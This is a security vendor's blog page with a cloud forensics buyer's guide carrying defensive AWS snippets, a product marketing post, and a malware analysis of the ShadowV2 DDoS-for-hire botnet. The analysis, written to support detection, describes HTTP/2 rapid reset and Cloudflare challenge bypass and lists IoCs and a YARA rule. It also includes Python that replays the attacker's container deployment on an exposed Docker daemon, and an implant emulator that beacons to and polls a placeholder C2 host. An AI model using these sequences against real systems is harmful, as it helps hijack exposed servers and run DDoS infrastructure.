July 15, 2025

Forensics or Fauxrensics: Five Core Capabilities for Cloud Forensics and Incident Response

This blog covers the five core capabilities that security teams should consider when evaluating a cloud forensics and incident response solution.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Calum Hall
Technical Content Researcher

The speed and scale at which new cloud resources can be spun up has resulted in uncontrolled deployments, misconfigurations, and security risks, leaving security teams racing to secure their business's rapid migration from traditional on-premises environments to the cloud.

While many organizations have successfully extended their prevention and detection capabilities to the cloud, they are now experiencing another major gap: forensics and incident response.

Once malicious activity has been identified, understanding its true scope and impact can be nearly impossible. The proliferation of cloud resources across multiple providers, along with the addition of container and serverless capabilities, only adds to the complexity. It's clear that organizations need a better way to manage cloud incident response.

Security teams are looking to move past their homegrown solutions and open-source tools to incorporate real cloud forensics capabilities. However, with the increased buzz around cloud forensics, it can be challenging to decipher what is real cloud forensics, and what is “fauxrensics.”

This blog covers the five core capabilities that security teams should consider when evaluating a cloud forensics and incident response solution.


1. Depth of data

There have been many conversations among the security community about whether cloud forensics is just log analysis. The reality, however, is that cloud forensics necessitates access to a robust dataset that extends far beyond traditional log data sources.

While logs provide valuable insights, a forensics investigation demands a deeper understanding derived from multiple data sources, including disk, network, and memory, within the cloud infrastructure. Full disk analysis complements log analysis, offering crucial context for identifying the root cause and scope of an incident.

For instance, when investigating an incident involving a Kubernetes cluster running on an EC2 instance, access to bash history can provide insights into the commands executed by attackers on the affected instance, which would not be available through cloud logs alone.
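As an illustration, a minimal sketch of collecting that kind of host-level artifact with boto3 and AWS Systems Manager Run Command might look like the following. The instance ID is hypothetical, and the approach assumes the SSM agent is installed and the instance profile allows Systems Manager access.

import time
import boto3

# Hypothetical ID of the affected EC2 instance.
INSTANCE_ID = "i-0123456789abcdef0"

ssm = boto3.client("ssm", region_name="us-east-1")

# Use Run Command to read shell history from the suspect host.
resp = ssm.send_command(
    InstanceIds=[INSTANCE_ID],
    DocumentName="AWS-RunShellScript",
    Parameters={"commands": ["cat /root/.bash_history /home/*/.bash_history 2>/dev/null"]},
)
command_id = resp["Command"]["CommandId"]

# Poll until the command completes, then print the captured history.
while True:
    time.sleep(2)
    result = ssm.get_command_invocation(CommandId=command_id, InstanceId=INSTANCE_ID)
    if result["Status"] not in ("Pending", "InProgress"):
        break
print(result["StandardOutputContent"])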

Having all of the evidence in one place can also significantly streamline investigations. Unifying your evidence, be it disk images, memory captures, or cloud logs, into a single timeline allows security teams to reconstruct an attack's origin, path, and impact far more easily. Multi-cloud environments also require platforms that can aggregate data from many providers and services into one place, enabling more holistic investigations and reducing security blind spots.

Collecting data from ephemeral resources in modern cloud and containerized environments is equally important. Critical evidence can be lost in seconds as resources constantly spin up and down, so the ability to capture this data before it's gone is a huge advantage to security teams, who would otherwise have to piece together what happened after the affected service is long gone.
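To make the single-timeline idea concrete, here is a minimal sketch that merges already-parsed records from hypothetical cloud-log, disk, and memory sources into one chronologically ordered view. The record format, field names, and event contents are assumptions for illustration.

from datetime import datetime, timezone

# Hypothetical, already-parsed evidence records from three different sources.
cloud_log_events = [
    {"ts": "2025-07-01T10:02:11Z", "source": "cloudtrail", "event": "RunInstances by suspicious role"},
]
disk_artifacts = [
    {"ts": "2025-07-01T10:05:43Z", "source": "disk", "event": "/tmp/miner dropped on affected instance"},
]
memory_findings = [
    {"ts": "2025-07-01T10:06:02Z", "source": "memory", "event": "outbound connection to known bad host"},
]

def parse_ts(record):
    # Normalize every timestamp to UTC so events from different sources sort correctly.
    return datetime.fromisoformat(record["ts"].replace("Z", "+00:00")).astimezone(timezone.utc)

# Merge everything into one chronologically ordered timeline.
timeline = sorted(cloud_log_events + disk_artifacts + memory_findings, key=parse_ts)

for record in timeline:
    print(f'{record["ts"]}  [{record["source"]}]  {record["event"]}')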

[Image: The value of combined analysis in Darktrace / CLOUD and Cado, bringing together cloud logs, host, and memory data]

2. Chain of custody

Chain of custody is critical in the context of legal proceedings and is an essential component of forensics and incident response. However, chain of custody in the cloud can be extremely complex, given the number of people who have access and the rise of multi-cloud environments.

In the cloud, maintaining a reliable chain of custody becomes even more complex than it already is, because it must account for multiple access points, service providers, and third parties. Automated evidence tracking is a must: it ensures that all actions are logged, from collection to storage to access. Automation also minimizes the chance of human error, reducing the risk of mistakes or gaps in evidence handling, especially in high-pressure, fast-moving investigations.

The ability to preserve unaltered copies of forensic evidence in a secure manner is required to ensure integrity throughout an investigation. This is not just a technical concern but a legal one: documenting and timestamping your evidence handling allows it to stand up to court or regulatory review.

Real cloud forensics platforms should autonomously handle chain of custody in the background, recording and safeguarding evidence without human intervention.
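As a simple illustration of what automated evidence tracking can look like under the hood, the sketch below hashes an artifact and appends a timestamped entry to a custody log. The file paths, actor names, and log format are hypothetical.

import hashlib
import json
from datetime import datetime, timezone
from pathlib import Path

def record_custody_event(evidence_path: str, action: str, actor: str,
                         log_path: str = "chain_of_custody.jsonl") -> dict:
    """Append a timestamped, hash-verified entry to a custody log (JSON Lines)."""
    sha256 = hashlib.sha256(Path(evidence_path).read_bytes()).hexdigest()
    entry = {
        "evidence": evidence_path,
        "sha256": sha256,                 # proves the artifact was not altered
        "action": action,                 # e.g. "collected", "copied", "accessed"
        "actor": actor,                   # person or automation performing the action
        "timestamp": datetime.now(timezone.utc).isoformat(),
    }
    with open(log_path, "a") as log:
        log.write(json.dumps(entry) + "\n")
    return entry

# Example: record the collection of a disk image by an automated pipeline.
record_custody_event("evidence/i-0abc-vol1.dd", "collected", "forensics-automation")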

3. Automated collection and isolation

When malicious activity is detected, the speed at which security teams can determine root cause and scope is essential to reducing Mean Time to Response (MTTR).

Automated forensic data collection and system isolation ensure that evidence is collected and compromised resources are isolated at the first sign of malicious activity, often before an attacker has had the chance to move laterally or cover their tracks. This enables security teams to prevent potential damage and spread while a deeper-dive forensics investigation takes place. It also ensures that critical incident evidence residing in ephemeral environments is preserved in case it is needed for an investigation; this evidence may only exist for minutes, leaving no time for a human analyst to capture it.

Cloud forensics and incident response platforms should offer the ability to natively integrate with incident detection and alerting systems and/or built-in product automation rules to trigger evidence capture and resource isolation.
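For example, an automation rule wired to an alert could preserve and contain an affected EC2 instance along the following lines. This is a minimal boto3 sketch with hypothetical instance and security-group IDs, not a complete isolation workflow.

import boto3

# Hypothetical values; in practice these would come from the alert payload.
INSTANCE_ID = "i-0123456789abcdef0"
QUARANTINE_SG = "sg-0aaaabbbbccccdddd"   # security group with no permissive rules

ec2 = boto3.client("ec2", region_name="us-east-1")

# 1. Preserve evidence: snapshot every EBS volume attached to the instance.
volumes = ec2.describe_volumes(
    Filters=[{"Name": "attachment.instance-id", "Values": [INSTANCE_ID]}]
)["Volumes"]
for volume in volumes:
    ec2.create_snapshot(
        VolumeId=volume["VolumeId"],
        Description=f"IR snapshot of {volume['VolumeId']} from {INSTANCE_ID}",
    )

# 2. Contain: swap the instance's security groups for the quarantine group,
#    cutting it off from the rest of the environment while analysis takes place.
ec2.modify_instance_attribute(InstanceId=INSTANCE_ID, Groups=[QUARANTINE_SG])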

4. Ease of use

Security teams shouldn’t require deep cloud or incident response knowledge to perform forensic investigations of cloud resources. They already have enough on their plates.

While traditional forensics tools and approaches have made investigation and response extremely tedious and complex, modern forensics platforms prioritize usability at their core, and leverage automation to drastically simplify the end-to-end incident response process, even when an incident spans multiple Cloud Service Providers (CSPs).

Usability is a core requirement for any modern forensics platform. Security teams should not need in-depth knowledge of every system and resource in a given estate. Workflows, automation, and guidance should make it possible for an analyst to investigate whatever resource they need to.

Unifying the workflow across multiple clouds can also save security teams a huge amount of time and resources. Investigations often span multiple CSPs, and a good security platform should provide a single place to search, correlate, and analyze evidence across all environments.

Features such as cross-cloud support, data enrichment, a single timeline view, saved search, and faceted search help advanced analysts achieve greater efficiency and enable novice analysts to participate in more complex investigations.

5. Incident preparedness

Incident response shouldn't just be reactive. Modern security teams need to regularly test their ability to acquire new evidence, triage assets, and respond to threats across both new and existing resources, ensuring readiness even in the rapidly changing environments of the cloud. Continuously assessing your incident response and forensics workflows enables you to rapidly improve your processes and to identify and mitigate any gaps that could prevent the organization from effectively responding to potential threats.

Real forensics platforms deliver features that enable security teams to prepare extensively and understand their shortcomings before they are in the heat of an incident. For example, cloud forensics platforms can provide the ability to:

  • Run readiness checks and see readiness trends over time
  • Identify and mitigate issues that could prevent rapid investigation and response
  • Ensure the correct logging, management agents, and other cloud-native tools are appropriately configured and operational
  • Ensure that data gathered during an investigation can be decrypted
  • Verify that permissions are aligned with best practices and are capable of supporting incident response efforts
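As a small example of what the logging and agent checks above might look like in practice, the sketch below uses boto3 to confirm that CloudTrail is actively logging and that instances are reachable via the SSM agent. The region and scope are illustrative, and a real readiness check would cover far more ground.

import boto3

cloudtrail = boto3.client("cloudtrail", region_name="us-east-1")
ssm = boto3.client("ssm", region_name="us-east-1")

# Check 1: is at least one CloudTrail trail actively logging?
trails = cloudtrail.describe_trails()["trailList"]
logging_enabled = any(
    cloudtrail.get_trail_status(Name=t["TrailARN"]).get("IsLogging") for t in trails
)
print(f"CloudTrail logging enabled: {logging_enabled}")

# Check 2: which instances have a reachable SSM agent (needed for live collection)?
managed = ssm.describe_instance_information()["InstanceInformationList"]
online = [i["InstanceId"] for i in managed if i.get("PingStatus") == "Online"]
print(f"Instances reachable via SSM: {len(online)}")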

Cloud forensics with Darktrace

Darktrace delivers a proactive approach to cyber resilience in a single cybersecurity platform, including cloud coverage. Darktrace / CLOUD is a real-time Cloud Detection and Response (CDR) solution built with advanced AI to make cloud security accessible to all security teams and SOCs. By using multiple machine learning techniques, Darktrace brings unprecedented visibility, threat detection, investigation, and incident response to hybrid and multi-cloud environments.

Darktrace’s cloud offerings have been bolstered with the acquisition of Cado Security Ltd., which enables security teams to gain immediate access to forensic-level data in multi-cloud, container, serverless, SaaS, and on-premises environments.


Need help evaluating cloud security solutions?

Discover five essential capabilities for effective cloud forensics and incident response and how AI-based security solutions can make a difference.



September 23, 2025

It’s Time to Rethink Cloud Investigations


Cloud Breaches Are Surging

Cloud adoption has revolutionized how businesses operate, offering speed, scalability, and flexibility. But for security teams, this transformation has introduced a new set of challenges, especially when it comes to incident response (IR) and forensic investigations.

Cloud-related breaches are skyrocketing – 82% of breaches now involve cloud-stored data (IBM Cost of a Data Breach, 2023). Yet incidents often go unnoticed for days: according to a 2025 report by Cybersecurity Insiders, of the 65% of organizations that experienced a cloud-related incident in the past year, only 9% detected it within the first hour, and 62% took more than 24 hours to remediate it (Cybersecurity Insiders, Cloud Security Report 2025).

Despite the shift to cloud, many investigation practices remain rooted in legacy on-prem approaches. According to a recent report, 65% of organizations spend approximately 3-5 days longer when investigating an incident in the cloud vs. on premises.

Cloud investigations must evolve, or risk falling behind attackers who are already exploiting the cloud’s speed and complexity.

4 Reasons Cloud Investigations Are Broken

The cloud’s dynamic nature – with its ephemeral workloads and distributed architecture – has outpaced traditional incident response methods. What worked in static, on-prem environments simply doesn’t translate.

Here’s why:

  1. Ephemeral workloads
    Containers and serverless functions can spin up and vanish in minutes. Attackers know this as well – they’re exploiting short-lived assets for “hit-and-run” attacks, leaving almost no forensic footprint. If you’re relying on scheduled scans or manual evidence collection, you’re already too late.
  2. Fragmented tooling
    Each cloud provider has its own logs, APIs, and investigation workflows. In addition, not all logs are enabled by default, cloud providers typically limit the scope of their logs (both in terms of what data they collect and how long they retain it), and some logs are only available through undocumented APIs. This creates siloed views of attacker activity, making it difficult to piece together a coherent timeline. Now layer in SaaS apps, Kubernetes clusters, and shadow IT — suddenly you’re stitching together 20+ tools just to find out what happened. Analysts call it the ‘swivel-chair Olympics,’ and it’s burning hours they don’t have.
  3. SOC overload
    Analysts spend the bulk of their time manually gathering evidence and correlating logs rather than responding to threats. This slows down investigations and increases burnout. SOC teams are drowning in noise; they receive thousands of alerts a day, the majority of which never get touched. False positives eat hundreds of hours a month, and consequently burnout is rife.  
  4. Cost of delay
    The longer an investigation takes, the higher its cost. Breaches contained in under 200 days save an average of over $1M compared to those that linger (IBM Cost of a Data Breach 2025).

These challenges create a dangerous gap for threat actors to exploit. By the time evidence is collected, attackers may have already accessed or exfiltrated data, or entrenched themselves deeper into your environment.

What’s Needed: A New Approach to Cloud Investigations

It’s time to ditch the manual, reactive grind and embrace investigations that are automated, proactive, and built for the world you actually defend. Here’s what the next generation of cloud forensics must deliver:

  • Automated evidence acquisition
    Capture forensic-level data the moment a threat is detected and before assets disappear.
  • Unified multi-cloud visibility
    Stitch together logs, timelines, and context across AWS, Azure, GCP, and hybrid environments into a single unified view of the investigation.
  • Accelerated investigation workflows
    Reduce time-to-insight from hours or days to minutes with automated analysis of forensic data, enabling faster containment and recovery.
  • Empowered SOC teams
    Fully contextualised data and collaboration workflows between teams in the SOC ensure seamless handover, freeing up analysts from manual collection tasks so they can focus on what matters: analysis and response.

Attackers are already leveraging the cloud’s agility. Defenders must do the same — adopting solutions that match the speed and scale of modern infrastructure.

Cloud Changed Everything. It’s Time to Change Investigations.  

The cloud fundamentally reshaped how businesses operate. It’s time for security teams to rethink how they investigate threats.

Forensics can no longer be slow, manual, and reactive. It must be instant, automated, and cloud-first — designed to meet the demands of ephemeral infrastructure and multi-cloud complexity.

The future of incident response isn’t just faster. It’s smarter, more scalable, and built for the environments we defend today, not those of ten years ago.  

On October 9th, Darktrace is revealing the next big thing in cloud security. Don’t miss it – sign up for the webinar.

About the author
Kellie Regan
Director, Product Marketing - Cloud Security

September 23, 2025

ShadowV2: An emerging DDoS for hire botnet


Introduction: ShadowV2 DDoS

Darktrace's latest investigation uncovered a novel campaign that blends traditional malware with modern DevOps technology.

At the center of this campaign is a Python-based command-and-control (C2) framework hosted on GitHub Codespaces. The campaign also uses a Python-based spreader with a multi-stage Docker deployment as the initial access vector.

The campaign further makes use of a Go-based Remote Access Trojan (RAT) that implements a RESTful registration and polling mechanism, enabling command execution and communication with its operators.

ShadowV2 attack techniques

What sets this campaign apart is the sophistication of its attack toolkit.

The threat actors employ advanced methods such as HTTP/2 rapid reset, a Cloudflare under attack mode (UAM) bypass, and large-scale HTTP floods, demonstrating a capability to combine distributed denial-of-service (DDoS) techniques with targeted exploitation.

With the inclusion of an OpenAPI specification, implemented with FastAPI and Pydantic and a fully developed login panel and operator interface, the infrastructure seems to resemble a “DDoS-as-a-service” platform rather than a traditional botnet, showing the extent to which modern malware increasingly mirrors legitimate cloud-native applications in both design and usability.

Analysis of a ShadowV2 attack

Initial access

The initial compromise originates from a Python script hosted on GitHub Codespaces. This can be inferred from the observed headers:

User-Agent: docker-sdk-python/7.1.0

X-Meta-Source-Client: github/codespaces

The user agent shows that the attacker is using the Python Docker SDK, a Python library for interacting with the Docker API to create and manage containers. The X-Meta-Source-Client header appears to have been injected by GitHub into the request to allow for attribution, although there is no documentation online about this header.

The IP the connections originate from is 23.97.62[.]139, which is a Microsoft IP based in Singapore. This aligns with expectations as GitHub is owned by Microsoft.

This campaign targets exposed Docker daemons, specifically those running on AWS EC2. Darktrace runs a number of honeypots across multiple cloud providers and has only observed attacks against honeypots running on AWS EC2. By default, Docker is not accessible from the Internet; however, it can be configured to allow external access, which can be useful for managing complex deployments where remote access to the Docker API is needed.

Typically, most campaigns targeting Docker will either take an existing image from Docker Hub and deploy their tools within it, or upload their own pre-prepared image to deploy. This campaign works slightly differently: it first spawns a generic "setup" container and installs a number of tools within it. This container is then imaged and deployed as a live container, with the malware arguments passed in via environment variables (a rough reconstruction of this sequence is sketched after the figures below).

Figure 1: Attacker creates a blank container from an Ubuntu image.
Figure 2: Attacker sets up their tools for the attack.
Figure 3: Attacker deploys a new container using the image from the setup container.
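To make the sequence in Figures 1-3 concrete, the sketch below reproduces the same create, install, commit, and deploy pattern with the Python Docker SDK against a lab daemon. The daemon address, installed packages, and environment values are illustrative assumptions; only the variable names MASTER_ADDR and VPS_NAME come from the observed campaign.

import docker

# Connect to a remotely exposed Docker daemon (lab address, for illustration only).
client = docker.DockerClient(base_url="tcp://10.0.0.5:2375")

# Step 1: spawn a generic "setup" container from a stock Ubuntu image.
setup = client.containers.run("ubuntu:22.04", command="sleep infinity",
                              name="setup", detach=True)

# Step 2: install tooling inside the running setup container.
setup.exec_run("apt-get update")
setup.exec_run("apt-get install -y curl ca-certificates")

# Step 3: image the prepared container...
image = setup.commit(repository="staged", tag="latest")

# Step 4: ...and deploy a live container from that image, passing arguments
# in via environment variables, as described above.
client.containers.run(
    image.id,
    detach=True,
    environment={"MASTER_ADDR": "c2.example.test", "VPS_NAME": "node-01"},
)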

It is unclear why the attackers chose this approach - one possibility is that the actor is attempting to avoid inadvertently leaving forensic artifacts by performing the build on the victim machine, rather than building it themselves and uploading it.

Malware analysis

The Docker container acts as a wrapper around a single binary, dropped in /app/deployment. This is an ELF binary written in Go, a popular choice for modern malware. Helpfully, the binary is unstripped, making analysis significantly easier.

The current version of the malware has not been reported by OSINT providers such as VirusTotal. Using the domain name from the MASTER_ADDR variable and other IoCs, we were able to locate two older versions of the malware that were submitted to VirusTotal on June 25 and July 30, respectively [1] [2]. Neither of these had any detections, and each was only submitted once via the web portal, from the US and Canada respectively. Darktrace first observed the attack against its honeypot on June 24, so it could be a victim of this campaign submitting the malware to VirusTotal. Given how close the submissions are to the start of the attacks, it could also be the attacker testing for detections; however, it is not possible to know for certain.

The malware begins by phoning home, using the MASTER_ADDR and VPS_NAME identifiers passed in from the Docker run environmental variables. In addition, the malware derives a unique VPS_ID, which is the VPS_NAME concatenated with the current unix timestamp. The VPS_ID is used for all communications with the C2 server as the identifier for the specific implant. If the malware is restarted, or the victim is re-infected, the C2 server will inform the implant of its original VPS_ID to ensure continuity.

Figure 4: Snippet that performs the registration by sending a POST request to the C2 API with a JSON structure.

From there, the malware then spawns two main loops that will remain active for the lifetime of the implant. Every second, it sends a heartbeat to the C2 by sending the VPS_ID to hxxps://shadow.aurozacloud[.]xyz/api/vps/heartbeat via POST request. Every 5 seconds, it retrieves hxxps://shadow.aurozacloud[.]xyz/api/vps/poll/<VPS ID> via a GET request to poll for new commands.

Figure 5: The poll mechanism.

At this stage, Darktrace security researchers wrote a custom client, running on the server infected by the attacker, that mimicked the implant. The goal was to intercept commands from the C2. Through this, the C2 was observed initiating an attack against chache08[.]werkecdn[.]me using a 120-thread HTTP/2 rapid reset attack. The site appears to be hosted on an Amsterdam VPS provided by FDCServers, a server hosting company. It was not possible to identify what normally runs on this site, as it returns a 403 Forbidden error when visited.
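The researchers' client itself is not published, but a rough sketch of an implant emulator built only from the behavior described here might look like the following. The registration path and JSON payload shapes are assumptions; the heartbeat and poll endpoints and the VPS_ID derivation come from the analysis above. The C2 address is a placeholder, and any such emulation should only ever be pointed at infrastructure in an isolated research setting.

import time
import requests

# Placeholder standing in for the defanged C2 domain listed in the IoCs below.
C2 = "https://c2.example.test"
VPS_NAME = "research-node"
# The implant derives its identifier from the name plus the current Unix timestamp.
VPS_ID = f"{VPS_NAME}{int(time.time())}"

session = requests.Session()

# Registration: the exact path is an assumption; the field names match those
# seen in the API's Pydantic validation error later in this analysis.
session.post(f"{C2}/api/vps/register", json={"vps_id": VPS_ID, "vps_name": VPS_NAME})

tick = 0
while True:
    # Heartbeat every second (payload shape assumed).
    session.post(f"{C2}/api/vps/heartbeat", json={"vps_id": VPS_ID})
    if tick % 5 == 0:
        # Poll for tasking every five seconds and log it rather than acting on it.
        commands = session.get(f"{C2}/api/vps/poll/{VPS_ID}")
        print("received:", commands.text)
    tick += 1
    time.sleep(1)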

Darktrace’s code analysis found that the returned commands contain the following fields:

  • Method (e.g. GET, POST)
  • A unique ID for the attack
  • A URL endpoint used to report attack statistics
  • The target URL & port
  • The duration of the attack
  • The number of threads to use
  • An optional proxy to send HTTP requests through

The malware then spins up several threads, each running a configurable number of HTTP clients using Valyala’s fasthttp library, an open source Go library for making high-performance HTTP requests. After this is complete, it uses these clients to perform an HTTP flood attack against the target.

Figure 6: A snippet showing the fasthttp client creation loop, as well as a function to report the worker count back to the C2.

In addition, it also features several flags to enable different bypass mechanisms to augment the malware:

  • WordPress bypass (does not appear to be implemented - the flag is not used anywhere)
  • Random query strings appended to the URL
  • Spoofed forwarding headers with random IP addresses
  • Cloudflare under-attack-mode (UAM) bypass
  • HTTP2 rapid reset

The most interesting of these is the Cloudflare UAM bypass mechanism. When this is enabled, the malware will attempt to use a bundled ChromeDP binary to solve the Cloudflare JavaScript challenge that is presented to new visitors. If this succeeds, the clearance cookie obtained is then included in subsequent requests. This is unlikely to work in most cases as headless Chrome browsers are often flagged, and a regular CAPTCHA is instead served.

Figure 7: The UAM bypass success snippet.

Additionally, the malware has a flag to enable an HTTP2 rapid reset attack mode instead of a regular HTTP flood. In HTTP2, a client can create thousands of requests within a single connection using multiplexing, allowing sites to load faster. The number of request streams per connection is capped however, so in a rapid reset attack many requests are made and then immediately cancelled to allow more requests to be created. This allows a single client to execute vastly more requests per second and use more server resources than it otherwise would, allowing for more effective denial-of-service (DoS) attacks.

Figure 8: The HTTP2 rapid reset snippet from the main attack function.

API/C2 analysis

As mentioned throughout the malware analysis section, the malware communicates with a C2 server using HTTP. The server is behind Cloudflare, which obscures its hosting location and prevents further analysis. However, based on analysis of the spreader, it's likely running on GitHub Codespaces.

When sending a malformed request to the API, an error generated by the Pydantic library is returned:

{"detail":[{"type":"missing","loc":["body","vps_id"],"msg":"Field required","input":{"vps_name":"xxxxx"},"url":"https://errors.pydantic.dev/2.11/v/missing"}]}

This shows they are using Python for the API, which is the same language that the spreader is written in.

One of the larger frameworks that ships with Pydantic is FastAPI, which also ships with Swagger. The malware author left this publicly exposed, and Darktrace's researchers were able to obtain a copy of their API documentation. The author appears to have since noticed this, however, as subsequent attempts to access it now return an HTTP 404 Not Found error.
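For reference, the error above is the standard response shape FastAPI generates when a Pydantic v2 request model is missing a required field. The minimal sketch below, with the endpoint path assumed and the field names taken from the observed error, reproduces the same fingerprint.

from fastapi import FastAPI
from pydantic import BaseModel

app = FastAPI()

class VpsCheckin(BaseModel):
    vps_id: str      # omitting this field triggers the "missing" error seen above
    vps_name: str

# Endpoint path chosen for illustration; any route taking this model behaves the same.
@app.post("/api/vps/heartbeat")
def heartbeat(body: VpsCheckin):
    return {"ok": True}

# POSTing {"vps_name": "xxxxx"} to this route returns a 422 response whose "detail"
# list contains {"type": "missing", "loc": ["body", "vps_id"], ...}, matching the
# structure returned by the ShadowV2 API.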

Figure 9: Swagger UI view based on the obtained OpenAPI spec.

This is useful to have as it shows all the API endpoints, including the exact fields they take and return, along with comments on each endpoint written by the attacker themselves.

It is very likely a DDoS for hire platform (or at the very least, designed for multi-tenant use) based on the extensive user API, which features authentication, distinctions between privilege level (admin vs user), and limitations on what types of attack a user can execute. The screenshot below shows the admin-only user create endpoint, with the default limits.

Figure 10: The admin-only user create endpoint.

The endpoint used to launch attacks can also be seen, which lines up with the options previously observed in the malware itself. Interestingly, this endpoint requires a list of zombie systems to launch the attack from. This is unusual, as most DDoS-for-hire services will decide this internally or simply launch the attack from every infected host (zombie). No endpoints that returned a list of zombies were found; however, it's possible one exists, as the return types are not documented for all the API endpoints.

Figure 11: The attack start endpoint.

There is also an endpoint to manage a blacklist of hosts that cannot be attacked. This could be to stop users from launching attacks against sites operated by the malware author; however, it's also possible the author is attempting to sell protection to victims, something that has been seen previously with other DDoS-for-hire services.

Figure 12: Blacklist endpoints.

Attempting to visit shadow[.]aurozacloud[.]xyz results in a seizure notice. It is most likely fake, as the same backend is still in use and all of the API endpoints continue to work. Appending /login to the path instead brings up the login screen for the DDoS platform. It describes itself as an "advanced attack platform", which highlights that it is almost certainly a DDoS-for-hire service. The UI is high quality, written in Tailwind, and even features animations.

Figure 13: The fake seizure notice.
Figure 14: The login UI at /login.

Conclusion

By leveraging containerization, an extensive API, and a full user interface, this campaign shows the continued development of cybercrime-as-a-service. The ability to deliver modular functionality through a Go-based RAT and expose a structured API for operator interaction highlights how sophisticated some threat actors have become.

For defenders, the implications are significant. Effective defense requires deep visibility into containerized environments, continuous monitoring of cloud workloads, and behavioral analytics capable of identifying anomalous API usage and container orchestration patterns. The presence of a DDoS-as-a-service panel with full user functionality further emphasizes the need for defenders to think of these campaigns not as isolated tools but as evolving platforms.

Appendices

References

1. https://www.virustotal.com/gui/file/1b552d19a3083572bc433714dfbc2b75eb6930a644696dedd600f9bd755042f6

2. https://www.virustotal.com/gui/file/1f70c78c018175a3e4fa2b3822f1a3bd48a3b923d1fbdeaa5446960ca8133e9c

IoCs

Malware hashes (SHA256)

• 2462467c89b4a62619d0b2957b21876dc4871db41b5d5fe230aa7ad107504c99
• 1b552d19a3083572bc433714dfbc2b75eb6930a644696dedd600f9bd755042f6
• 1f70c78c018175a3e4fa2b3822f1a3bd48a3b923d1fbdeaa5446960ca8133e9c

C2 domain

• shadow.aurozacloud[.]xyz

Spreader IPs

• 23.97.62[.]139
• 23.97.62[.]136

Yara rule

rule ShadowV2 {
    meta:
        author = "nathaniel.bill@darktrace.com"
        description = "Detects ShadowV2 botnet implant"

    strings:
        $string1 = "shadow-go"
        $string2 = "shadow.aurozacloud.xyz"
        $string3 = "[SHADOW-NODE]"
        $symbol1 = "main.registerWithMaster"
        $symbol2 = "main.handleStartAttack"
        $symbol3 = "attacker.bypassUAM"
        $symbol4 = "attacker.performHTTP2RapidReset"
        $code1 = { 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 38 01 00 00 48 89 84 24 40 01 00 00 48 8B 4C 24 40 48 BA 00 09 6E 88 F1 FF FF FF 48 8D 04 0A E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 48 01 00 00 48 89 84 24 50 01 00 00 48 8D 05 ?? ?? ?? ?? BB 05 00 00 00 48 8D 8C 24 38 01 00 00 BF 02 00 00 00 48 89 FE E8 ?? ?? ?? ?? }
        $code2 = { 48 89 35 ?? ?? ?? ?? 0F B6 94 24 80 02 00 00 88 15 ?? ?? ?? ?? 0F B6 94 24 81 02 00 00 88 15 ?? ?? ?? ?? 0F B6 94 24 82 02 00 00 88 15 ?? ?? ?? ?? 0F B6 94 24 83 02 00 00 88 15 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? }
        $code3 = { 48 8D 15 ?? ?? ?? ?? 48 89 94 24 68 04 00 00 48 C7 84 24 78 04 00 00 15 00 00 00 48 8D 15 ?? ?? ?? ?? 48 89 94 24 70 04 00 00 48 8D 15 ?? ?? ?? ?? 48 89 94 24 80 04 00 00 48 8D 35 ?? ?? ?? ?? 48 89 B4 24 88 04 00 00 90 }

    condition:
        uint16(0) == 0x457f and (2 of ($string*) or 2 of ($symbol*) or any of ($code*))
}

The content provided in this blog is published by Darktrace for general informational purposes only and reflects our understanding of cybersecurity topics, trends, incidents, and developments at the time of publication. While we strive to ensure accuracy and relevance, the information is provided “as is” without any representations or warranties, express or implied. Darktrace makes no guarantees regarding the completeness, accuracy, reliability, or timeliness of any information presented and expressly disclaims all warranties.

Nothing in this blog constitutes legal, technical, or professional advice, and readers should consult qualified professionals before acting on any information contained herein. Any references to third-party organizations, technologies, threat actors, or incidents are for informational purposes only and do not imply affiliation, endorsement, or recommendation.

Darktrace, its affiliates, employees, or agents shall not be held liable for any loss, damage, or harm arising from the use of or reliance on the information in this blog.

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content without notice.

About the author
Nate Bill
Threat Researcher